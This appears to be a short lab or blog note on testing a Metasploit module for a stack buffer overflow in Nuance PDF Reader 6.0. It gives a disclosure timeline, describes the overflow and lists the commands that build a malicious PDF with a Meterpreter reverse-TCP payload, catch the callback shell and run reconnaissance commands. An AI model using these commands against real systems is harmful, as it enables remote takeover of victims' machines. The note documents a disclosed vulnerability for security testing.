Timeline :
Vulnerability discovered by corelanc0d3r & rick2600 the 2010-04-03
Vulnerability disclosed to the vendor the 2010-04-08
Coordinated vulnerability disclosure the 2010-10-08
Metasploit PoC provided the 2010-10-08
PoC provided by :
corelanc0d3r
rick2600
Reference(s) :
Affected version(s) :
Nuance PDF Reader 6.0
Tested on Windows XP SP3 with :
Nuance PDF Reader 6.0
Description :
This module exploits a stack buffer overflow in Nuance PDF Reader v6.0. The vulnerability is triggered when opening a malformed PDF file that contains an overly long string in a /Launch field. This results in overwriting a structured exception handler record. This exploit does not use javascript.
Commands :
use exploit/windows/fileformat/nuance_pdf_launch_overflow
set OUTPUTPATH /home/eromang
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploituse exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.178.21
exploit -jsessions -i 1
sysinfo
getuid
ipconfig